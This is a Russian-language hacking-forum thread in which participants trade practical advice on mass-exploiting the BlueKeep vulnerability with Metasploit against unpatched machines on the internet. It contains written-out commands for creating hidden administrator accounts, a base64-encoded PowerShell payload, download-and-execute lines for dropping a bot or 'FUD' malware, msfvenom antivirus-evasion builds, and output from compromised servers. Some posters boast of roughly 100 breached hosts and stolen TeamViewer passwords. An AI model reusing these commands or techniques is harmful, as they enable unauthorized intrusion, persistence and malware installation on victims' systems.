Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Alois · 13.05.2020

zhe_ka сказал(а):
Вам мало командной сроки от имени система?

В meterpreter просто гораздо больше возможностей, куча post exploit модулей. Зачем от этого всего отказываться? Если бы сессия чаще прилетала, то можно было бы и отказаться, но я вчера специально тестировал это, сессии прилетают одинаково часто.

kurama · 13.05.2020

Вот оно влияние школоло статей про всякие метерпретеры и реверсшеллы))) Кучка извр...в мучает софт размером в пол гига для массовых атак одним эксплоитом, 4 инстанса мсф запускать - это вообще лютый угар))) А ведь AV не дремлют и режут ваши метерпретеры на каждой второй тачке.
Если действительно без мсф ни как, то хотя бы жизнь себе облегчите и юзайте windows/x64/exec чтоб пользователя добавить и затем спокойно подключатся к рдп, а не отправлять бедолаг в синий экран по три раза на дню чтоб сессию заново поднять.

Сорян, не смог я мимо пройти)

Alois · 13.05.2020

kurama сказал(а):
Вот оно влияние школоло статей про всякие метерпретеры и реверсшеллы))) Кучка извр...в мучает софт размером в пол гига для массовых атак одним эксплоитом, 4 инстанса мсф запускать - это вообще лютый угар))) А ведь AV не дремлют и режут ваши метерпретеры на каждой второй тачке.
Если действительно без мсф ни как, то хотя бы жизнь себе облегчите и юзайте windows/x64/exec чтоб пользователя добавить и затем спокойно подключатся к рдп, а не отправлять бедолаг в синий экран по три раза на дню чтоб сессию заново поднять.

Сорян, не смог я мимо пройти)

Во всех туториалах и видео советуют использовать metepreter, но нашелся умник, который знает лучше всех))) Я даже не говорю про кривые недоскрипты на гитхабе, которые в 100 раз хуже метасплоита. Сделать группы и пользователя RDP, которые обнаружит любой админ? А не проще бота подкинуть, не? А если надо на взломанном компе выполнить лишь несколько задач, то зачем нужен RDP? Что за глупые советы...

Попробовал пресловутый windows/x64/exec на 10 уязвимых машинах. Ни на одной не сработал:

Первый цикл:
set cmd net user NewAdmin SuperDuperPass1 /add
Второй цикл:
set cmd net localgroup "administrators" NewAdmin /add
Третий цикл:
use exploit/windows/smb/psexec
set smbuser NewAdmin
set smbpass SuperDuperPass1
run
С psexec ещё проблемка, что порт 445 либо закрыт, либо фильтруется.

Допустим, два первых цикла можно обьединить. Но все равно, это бессмысленная потеря времени, не более. Я за это время в 10 раз больше машин пройду с метерпретером. Из них большинство не будут пробиты, но тех, что пробиты будут, будет больше, чем за тоже время мучаться с exec. exec хорош только если надо выполнить что-то конкретное и отключиться. Ну или установить шеллкод, который будет соединяться с нами. И это попробовать можно.
Другое дело, что лучше подготовить свой собственный payload в той же Visual Studio, например. Метепретер заезженный, конечно, тоже.

kurama · 14.05.2020

Alois сказал(а):
Во всех туториалах и видео советуют использовать metepreter, но нашелся умник, который знает лучше всех)))

Я про это и написал, что современные кулхацкеры кроме него и не знают ни чего) И усложняя себе жизнь юзают его везде где непопадя.

Alois сказал(а):
Я даже не говорю про кривые недоскрипты на гитхабе, которые в 100 раз хуже метасплоита.

Ну естественно, на то они и недоскрипты. Включи моск и доведи до ума. Или свой напиши.

Alois сказал(а):
Сделать группы и пользователя RDP, которые обнаружит любой админ?

Ну шо ты брешешь, ну какой админ. Ты тачки ломаешь на которых уже ровно год как не могут поставить патч для устранения дыры))
Даже если такое случится, в сети тыщи уязвимых машин не стоит трястись над каждой взломанной.
Сразу видно мамкиного теоретика, который и дедиков толком не нюхал))

Alois сказал(а):
А не проще бота подкинуть, не? А если надо на взломанном компе выполнить лишь несколько задач, то зачем нужен RDP? Что за глупые советы...

Конечно проще. Вот только это как раз и делается через windows/x64/exec. Представь ты запустишь эксплоит в многопотоке(а это возможно в мсф) и тебе будет по сотне сессий в час прилетать, как ты будешь в ручную эти пару задачь обрабатывать на каждой.

Мне первый вариант комента больше нравился не стоило тебе его править и пытатся умничать тут))

Alois · 14.05.2020

Не знаю, кого тебе там видно, но дедиков я взломал уже немало. Ну для начинающего. Около 100.
Только я через рдп никогда ещё к ним не подключался. На многих стоит TeamViewer и AnyDesk и у меня есть пароли от них. И даже их я ещё не пробовал использовать. Редко возвращаюсь на уже взломанные машины.
Не совсем понял про многопоточное сканирование в мсф. Ну есть set threads, но это же не даёт возможности сканировать несколько разных диапазонов одновременно. Я его использую, где могу.

hellotester · 14.05.2020

kurama сказал(а):
Вот оно влияние школоло статей про всякие метерпретеры и реверсшеллы))) Кучка извр...в мучает софт размером в пол гига для массовых атак одним эксплоитом, 4 инстанса мсф запускать - это вообще лютый угар))) А ведь AV не дремлют и режут ваши метерпретеры на каждой второй тачке.
Если действительно без мсф ни как, то хотя бы жизнь себе облегчите и юзайте windows/x64/exec чтоб пользователя добавить и затем спокойно подключатся к рдп, а не отправлять бедолаг в синий экран по три раза на дню чтоб сессию заново поднять.

Сорян, не смог я мимо пройти)

в BSOD они уходят от неверной постановки таргета и адреса памяти, но не как от пейлоада

PS. через блюкип пейлоад метрпертера запускаеться мимо ав никакой ав ее не режит, сколько было тачек с разными ав sophos ,eset ...etc. сессия была живее всех живых, он запускается сразу от системы если пробило блюкипом

Alois · 14.05.2020

Вот меня тоже слова про то, что метерпретер режется AV, смутили. Много раз заходил через метепретер на машины с касперским, эсетом, авирой. Базы должны быть свежие.
P.S.
Через windows/x64/exec слишком муторно как-то пока. Либо я не могу найти нормальных туториалов, как это делается все. А создавать новые учетки и потом заходить от них через RDP - ну такое себе, мне это не очень нужно.

Делаю так:

set payload windows/x64/exec
set cmd net user NewAdmin SuperDuperPass1 /add && net localgroup "administrators" NewAdmin /add
exploit

По RDP могу подключиться, но пароль неправильный.

Я сейчас пробую reverse_tcp4 со своим паролем. Результаты вроде бы получше.

Alois · 14.05.2020

Кажется, я понял, в чем дело. Группа "administrators" есть только на англоязычных виндах. Под каждый язык надо свою группу.

kurama · 14.05.2020

Alois сказал(а):
set cmd net user NewAdmin SuperDuperPass1 /add && net localgroup "administrators" NewAdmin /add

По RDP могу подключиться, но пароль неправильный.

ковычки и бэкслеши экранировать нужно

Alois сказал(а):
Кажется, я понял, в чем дело. Группа "administrators" есть только на англоязычных виндах. Под каждый язык надо свою группу.

не надо))

Код:

powershell net user NewAdmin SuperDuperPass1 /add; net localgroup (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = "S-1-5-32-544"').Name NewAdmin /add;

Alois · 14.05.2020

Этот код не работает.

net user NewAdmin xxx /add; net localgroup (Get-WmiObject <<<< -Class
Win32_Group -Filter 'LocalAccount = True AND SID = S-1-5-32-544').Name NewAdmin
/add;
+ CategoryInfo : InvalidOperation:

) [Get-WmiObject], Managemen
tException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.C
ommands.GetWmiObjectCommand

SID User
--- ----
S-1-5-18 NT AUTHORITY\▒▒▒▒▒▒▒
S-1-5-21-1944665544-796465550-3708436051-1007 BUH_TEST\USR1CV8

Recently Logged Users
=====================

SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1944665544-796465550-3708436051-1000 C:\Users\user1
S-1-5-21-1944665544-796465550-3708436051-1001 C:\Users\user2
S-1-5-21-1944665544-796465550-3708436051-1004 C:\Users\admin_2
S-1-5-21-1944665544-796465550-3708436051-1005 C:\Users\byteit
S-1-5-21-1944665544-796465550-3708436051-1007 C:\Users\USR1CV8
S-1-5-21-1944665544-796465550-3708436051-500 C:\Users\Администратор
S-1-5-80-1770670200-1234090253-3451813168-4041049723-2370973757 C:\Users\MsDtsServer110
S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921 C:\Users\MSSQLServerOLAPService
S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051 C:\Users\ReportServer
S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582 C:\Users\MSSQLFDLauncher
S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430 C:\Users\SQLSERVERAGENT
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 C:\Users\MSSQLSERVER

Shinobi · 14.05.2020

Это видимо у меня одного в теме неудачная охота -_-

Alois сказал(а):
Этот код не работает.

net user NewAdmin xxx /add; net localgroup (Get-WmiObject <<<< -Class
Win32_Group -Filter 'LocalAccount = True AND SID = S-1-5-32-544').Name NewAdmin
/add;
+ CategoryInfo : InvalidOperation: ) [Get-WmiObject], Managemen
tException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.C
ommands.GetWmiObjectCommand

SID User
--- ----
S-1-5-18 NT AUTHORITY\▒▒▒▒▒▒▒
S-1-5-21-1944665544-796465550-3708436051-1007 BUH_TEST\USR1CV8

Recently Logged Users
=====================

SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1944665544-796465550-3708436051-1000 C:\Users\user1
S-1-5-21-1944665544-796465550-3708436051-1001 C:\Users\user2
S-1-5-21-1944665544-796465550-3708436051-1004 C:\Users\admin_2
S-1-5-21-1944665544-796465550-3708436051-1005 C:\Users\byteit
S-1-5-21-1944665544-796465550-3708436051-1007 C:\Users\USR1CV8
S-1-5-21-1944665544-796465550-3708436051-500 C:\Users\Администратор
S-1-5-80-1770670200-1234090253-3451813168-4041049723-2370973757 C:\Users\MsDtsServer110
S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921 C:\Users\MSSQLServerOLAPService
S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051 C:\Users\ReportServer
S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582 C:\Users\MSSQLFDLauncher
S-1-5-80-344959196-2060754871-2302487193-2804545603-1466107430 C:\Users\SQLSERVERAGENT
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 C:\Users\MSSQLSERVER

как успехи? что то ловится?

у меня вообще результатов нет
сижу смотрю как пакеты бегают

и все

Alois · 14.05.2020

Shinobi сказал(а):
Это видимо у меня одного в теме неудачная охота -_-

как успехи? что то ловится?

у меня вообще результатов нет
сижу смотрю как пакеты бегают

и все

Да, стало как-будто чаще ловиться с reverse_tcp_rc4, если ставлю свой пароль.

Shinobi · 14.05.2020

Alois сказал(а):
Да, стало как-будто чаще ловиться с reverse_tcp_rc4, если ставлю свой пароль.

я тоже пробовал с reverse_tcp_rc4

кстати, какое оптимальное количество целей на один заход ?

я сначала достаточное огромное запустил
потом понял шо так не пойдет и это очень долго

оставил 25 айпи адресов

Alois · 14.05.2020

Shinobi сказал(а):
я тоже пробовал с reverse_tcp_rc4

кстати, какое оптимальное количество целей на один заход ?

я сначала достаточное огромное запустил
потом понял шо так не пойдет и это очень долго

оставил 25 айпи адресов

Я делал 30, сейчас 10 сделал, иначе пока до 30 доходит, некоторые сессии уже закрываются.

Shinobi · 14.05.2020

Alois сказал(а):
Я делал 30, сейчас 10 сделал, иначе пока до 30 доходит, некоторые сессии уже закрываются.

я вот то себе тоже стал думать
шо пока оно дойдет
сессия отлетит

Alois · 14.05.2020

Иногда вижу такое в TeamViewer:

[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is '15.2.2756 '
[+] TeamViewer's title is 'TeamViewer'
[*] Found handle to ID edit box 0x00000000
[*] Found handle to Password edit box 0x00000000
[+] ID: Kali-Team
[+] PASSWORD: Kali-Team
[*] Found handle to Email edit box 0x00000000
[*] Found handle to Password edit box 0x00000000
[+] EMAIL: Kali-Team
[+] PASSWORD: Kali-Team

Кто-то уже постарался))

Перебором сегодня получил впервые удаленный рабочий стол. В принципе, давно мог зайти, но как-то не особо нужно это было. Но все равно приятно.

net user "NewAdmin" "xxx" /add
net localgroup "Administradores" "NewAdmin" /add
net localgroup "Administrators" "NewAdmin" /add
net localgroup "Администраторы" "NewAdmin" /add
net localgroup "Administratoren" "NewAdmin" /add

Я так понимаю, теперь можно в параметр CMD windows/x64/exec воткнуть что-то типа
cmd /c bitsadmin /transfer 8

Ссылка скрыта от гостей

%TEMP%\hello.exe
или так
Invoke-WebRequest '

Ссылка скрыта от гостей

' -OutFile 'installer.exe'
А этот файл может быть, например, FUD от TheFatRat.

kurama · 15.05.2020

Alois сказал(а):
Этот код не работает.

Работает, если запускать в консоли powershell.
Чтоб заюзать его в мсф, нужно эту строку кодирнуть в base64 с кодировкой UTF-16LE и затем вбивать:

Код:

set cmd powershell -e bgBlAHQAIAB1AHMAZQByACAATgBlAHcAQQBkAG0AaQBuACAAUwB1AHAAZQByAEQAdQBwAGUAcgBQAGEAcwBzADEAIAAvAGEAZABkADsAIABuAGUAdAAgAGwAbwBjAGEAbABnAHIAbwB1AHAAIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEcAcgBvAHUAcAAgAC0ARgBpAGwAdABlAHIAIAAnAEwAbwBjAGEAbABBAGMAYwBvAHUAbgB0ACAAPQAgAFQAcgB1AGUAIABBAE4ARAAgAFMASQBEACAAPQAgACIAUwAtADEALQA1AC0AMwAyAC0ANQA0ADQAIgAnACkALgBOAGEAbQBlACAATgBlAHcAQQBkAG0AaQBuACAALwBhAGQAZAA7AA=

Чтоб система не запрашивала подтверждение действия, пароль не должен превышать 14 знаков. Так же не стоит забывать про ограничение длины команды в 600 символов с копейками.

zhe_ka · 15.05.2020

Alois сказал(а):
Перебором сегодня получил впервые удаленный рабочий стол. В принципе, давно мог зайти, но как-то не особо нужно это было. Но все равно приятно.

net user "NewAdmin" "xxx" /add
net localgroup "Administradores" "NewAdmin" /add
net localgroup "Administrators" "NewAdmin" /add
net localgroup "Администраторы" "NewAdmin" /add
net localgroup "Administratoren" "NewAdmin" /add

Я так понимаю, теперь можно в параметр CMD windows/x64/exec воткнуть что-то типа
cmd /c bitsadmin /transfer 8
Ссылка скрыта от гостей
%TEMP%\hello.exe
или так
Invoke-WebRequest '
Ссылка скрыта от гостей
' -OutFile 'installer.exe'
А этот файл может быть, например, FUD от TheFatRat.

Я так понимаю вы используете eternalblue вместе с windows/x64/exec?

Alois · 15.05.2020

zhe_ka сказал(а):
Я так понимаю вы используете eternalblue вместе с windows/x64/exec?

Пока только Bluekeep. Ethernalblue тоже попробую, но он даёт меньше сессий.

kurama сказал(а):
Работает, если запускать в консоли powershell.
Чтоб заюзать его в мсф, нужно эту строку кодирнуть в base64 с кодировкой UTF-16LE и затем вбивать:

Код:

set cmd powershell -e bgBlAHQAIAB1AHMAZQByACAATgBlAHcAQQBkAG0AaQBuACAAUwB1AHAAZQByAEQAdQBwAGUAcgBQAGEAcwBzADEAIAAvAGEAZABkADsAIABuAGUAdAAgAGwAbwBjAGEAbABnAHIAbwB1AHAAIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEcAcgBvAHUAcAAgAC0ARgBpAGwAdABlAHIAIAAnAEwAbwBjAGEAbABBAGMAYwBvAHUAbgB0ACAAPQAgAFQAcgB1AGUAIABBAE4ARAAgAFMASQBEACAAPQAgACIAUwAtADEALQA1AC0AMwAyAC0ANQA0ADQAIgAnACkALgBOAGEAbQBlACAATgBlAHcAQQBkAG0AaQBuACAALwBhAGQAZAA7AA=

Чтоб система не запрашивала подтверждение действия, пароль не должен превышать 14 знаков. Так же не стоит забывать про ограничение длины команды в 600 символов с копейками.

Понятно, спасибо. Я напрямую строку в powershell вводил, находясь на взломанном сервере, не работала.

msfvenom -p windows/x64/exec cmd='cmd.exe /c net user "Elevation" "Elevate2019!" /add && net localgroup "Administrators" "Elevation" /add' LHOST=xxx LPORT=xxx -e cmd/powershell_base64 -i 200 --encrypt=aes --encrypt-key=xxx -f exe > chess.exe
43/70 на Virustotal. Безнадежно. Без энкрипта и энкодинга все тоже самое.

или так

msfvenom -p windows/x64/exec cmd='powershell -e bgBlAHQAIAB1AHMAZQByACAATgBlAHcAQQBkAG0AaQBuACAAUwB1AHAAZQByAEQAdQBwAGUAcgBQAGEAcwBzADEAIAAvAGEAZABkADsAIABuAGUAdAAgAGwAbwBjAGEAbABnAHIAbwB1AHAAIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEcAcgBvAHUAcAAgAC0ARgBpAGwAdABlAHIAIAAnAEwAbwBjAGEAbABBAGMAYwBvAHUAbgB0ACAAPQAgAFQAcgB1AGUAIABBAE4ARAAgAFMASQBEACAAPQAgACIAUwAtADEALQA1AC0AMwAyAC0ANQA0ADQAIgAnACkALgBOAGEAbQBlACAATgBlAHcAQQBkAG0AaQBuACAALwBhAGQAZAA7AA=' LHOST=xxx LPORT=xxx -f exe > chess.exe

Только будет ли тут сессия? Мне что-то подсказывает, что нет. Как бы мне сессию открыть, чтобы не пиходилось по RDP заходить? Дело в том, что всегда после открытия сессии я мигрирую мой процесс в explorer.exe настоящего пользователя и уже там делаю все, что мне надо. Например, ставлю бота. Если я его буду ставить по RDP, то он же будет работать только у того же NewAdmin.

Alois · 16.05.2020

Этот код с PowerShell работает в Windows 10, а вот в моей тестовой Windows 7 тоже работает, но вылетает ошибка:

Get-WmiObject : Invalid query
At line:1 char:64
+ net user NewAdmin xxx /add; net localgroup (Get-WmiObject <<<< -ClassWin32_Group -Filter 'LocalAccount = True AND SID = S-1-5-32-544').Name NewAdmin /add;
+ CategoryInfo : InvalidOperation:

) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

К сожалению, я не вижу результат в Metasploit, смог ли выполниться скрипт. 30 машин прогнал exec, ни одной не пробил.

Все сервисы Codeby

Поиск

Поиск

Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Alois

kurama

Alois

kurama

Alois

hellotester

Alois

Alois

kurama

Alois

Shinobi

Alois

Shinobi

Alois

Shinobi

Alois

kurama

zhe_ka

Alois

Alois

Курс AD